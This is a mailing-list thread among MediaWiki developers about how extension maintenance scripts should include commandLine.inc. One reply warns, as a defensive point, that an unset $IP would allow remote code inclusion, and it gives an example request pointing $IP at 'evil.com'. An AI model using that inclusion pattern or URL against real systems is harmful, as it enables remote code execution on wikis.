"Tim Starling" tstarling@wikimedia.org wrote in message news:fung8v$bon$1@ger.gmane.org...
Andrew Garrett wrote:
On Wed, Apr 23, 2008 at 9:40 PM, Mark Clements
gmane@kennel17.co.uk wrote:
From an extension writer's point of view, the current situation is to
put in
a relative require_once() line to commandLine.inc and hope that the
file is
in the expected place.
global $IP; require_once( "$IP/maintenance/commandLine.inc" );
What am I missing?
Besides not working, that would be an arbitrary remote code execution vulnerability:
http://example.com/w/extensions/TheExtension/updateExtension.php?IP=http://e vil.com
$IP is not defined at the point that the script is run. $IP is defined by including commandLine.inc, so you're getting into a bit of a circular scenario there... :-)
A better way to do it is:
require( dirname(__FILE__).'/../../maintenance/commandLine.inc' );
If that path doesn't exist, the sysadmin can create it. Scripts that rely on the working directory being $IP or whatever are really annoying.
That is the current method, which causes problems as detailed in my previous post. To expand on your point, scripts that rely on the extension being in the extensions folder are also annoying.
We provide MediaWiki to our clients via a symlink in their web folder. They have an 'extensions' folder in their home directory where they can add their own extensions (the MW extensions folder is also used for the MW extensions we have enabled globally and which we offer support for). Currently there is no easy way for them to run the maintenance scripts for the extensions they have locally installed without hacking the code to fix the paths.
- Mark Clements (HappyDog)